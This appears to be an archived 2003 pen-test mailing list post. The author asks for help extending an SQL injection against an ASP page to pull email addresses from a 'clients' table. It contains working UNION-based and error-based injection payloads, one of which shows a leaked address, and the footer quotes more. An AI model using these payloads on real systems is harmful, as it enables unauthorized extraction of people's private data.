SQL injection - get more values

• Previous message: The C][A: "Netware Again: New eDirectory with NDS v8.78"
• Next in thread: Panos Dimitriou: "RE: SQL injection - get more values"
• Reply: Panos Dimitriou: "RE: SQL injection - get more values"
• Reply: Thaidn: "Re: SQL injection - get more values"
• Reply: Kevin Spett: "Re: SQL injection - get more values"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: 12 Feb 2003 17:48:41 -0000
From: Daniel Savi <dss@brturbo.com>
To: pen-test@securityfocus.com

Hi :)

i'm trying to get some info from clients table and email field....

i try this param into gubpage.asp?=...
') union select sum(email) from clients--
and got error about all queries needed...so, i tryed to solve with
') union select sum(email),1,1,1.... from clients--
until i get: operand type clash: text is incompatible with int

i found this answer into this forum (thanks :)), was:
' %2b convert(int, (SELECT email FROM clients WHERE email > 'a')) %2b '

i got this:
Syntax error converting the varchar value 'anon@isp.com' to a column of
data type int

Now, my problem: How can i get other e-mail from table knowing one valid
value?

i try this
' %2b convert(int, (SELECT email FROM clients WHERE email
> 'anon@isp.com')) %2b '
but no success

i think i can use NOT iN, but not sure how to use with convert...

Any tip are welcome!

Thanks

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

• Next message: Martin Walker: "RE: how to isolate a virtual hosted website, in order to do a A&P?"
• Previous message: The C][A: "Netware Again: New eDirectory with NDS v8.78"
• Next in thread: Panos Dimitriou: "RE: SQL injection - get more values"
• Reply: Panos Dimitriou: "RE: SQL injection - get more values"
• Reply: Thaidn: "Re: SQL injection - get more values"
• Reply: Kevin Spett: "Re: SQL injection - get more values"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages RE: SQL injection - get more values ... One solution is to try to find the exact columns to perform a union ... This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ... This list is provided by the SecurityFocus Security Intelligence Alert ... (Pen-Test) Re: how many clients per server w/ nessus? ... We accidentally just had 9 concurrent scans running from various clients. ... The server is a Netra X1 running Solaris 2.8. ... >> This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ... (Pen-Test) RE: CFM SQL injection ... You should better use union or alike get unauthorized data from the ... This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ... (Pen-Test) Re: sql injection - operand type clash ... > union select 1,username,1,1.... ... This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ... (Pen-Test) Re: SQL INJECTION - ORACLE ... Try seeing if using a subselect or a union works. ... ') UNION SELECT blah, blah, blah FROM bleh WHERE (''=' ... This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ... (Pen-Test)